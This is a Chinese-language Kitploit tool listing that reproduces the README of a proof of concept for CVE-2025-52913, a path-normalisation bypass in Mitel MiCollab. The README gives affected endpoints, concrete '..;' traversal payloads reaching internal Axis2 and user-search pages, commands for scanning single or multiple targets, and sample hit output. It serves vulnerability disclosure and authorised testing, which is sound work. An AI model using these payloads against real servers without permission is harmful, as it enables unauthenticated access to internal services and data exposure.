Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PoC-CVE-2025-52913 — 针对CVE-2025-52913的概念验证(PoC),这是一个影响Mitel MiCollab的路径标准化漏洞。 | Kitploit
工具/GitHubGitHub/pgasus99/poc-cve-2025-52913
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育
GitHubpgasus99/poc-cve-2025-52913

PoC-CVE-2025-52913

针对CVE-2025-52913的概念验证(PoC),这是一个影响Mitel MiCollab的路径标准化漏洞。

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-52913 - MiCollab 路径规范化漏洞

📌 概述

本仓库包含 CVE-2025-52913 的概念验证 (PoC) 代码,该漏洞影响 Mitel MiCollab 的路径规范化功能。

此问题允许未经身份验证的攻击者通过利用精心构造的 URL 序列(例如 ..;)绕过预期的路径限制,从而访问内部应用程序端点。


⚠️ 影响

成功利用可能导致:

  • 访问内部和受限端点
  • 暴露敏感应用程序组件
  • 潜在的信息泄露

🎯 受影响端点

该漏洞可通过以下路径触发:

root@kitploit:~
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/

💣 载荷示例

示例遍历载荷:

root@kitploit:~
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do

🚀 使用方法

1. 安装依赖

root@kitploit:~
pip install -r requirements.txt

2. 针对单个目标运行

root@kitploit:~
python3 POC-CVE-2025-52913.py example.com

3. 针对多个目标运行

root@kitploit:~
python3 POC-CVE-2025-52913.py domains.txt

🧪 示例

root@kitploit:~
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
    [!] Possible success

🔍 检测

如果满足以下条件,则目标可能存在漏洞:

  • 服务器响应 HTTP 200

  • 响应中包含:

    • Axis2
    • Axis2 Happiness Page
    • 内部端点的有效应用程序输出

🛠️ 技术细节

该漏洞源于对包含 ..; 的构造路径未进行正确的规范化处理,从而允许遍历到预期应用程序上下文之外。

此行为可能暴露内部服务,例如:

  • Axis2 Web 服务接口
  • 内部用户管理端点

👤 发现者

由 Dahmani Toumi 发现


📚 参考资料

  • CVE: CVE-2025-52913
  • (待供应商公告或 NVD 链接可用时添加)

⚖️ 免责声明

本项目仅供 教育目的和授权的安全测试 使用。

未经明确许可,请勿将此工具用于任何系统。 作者对任何滥用或损害不承担责任。


下载工具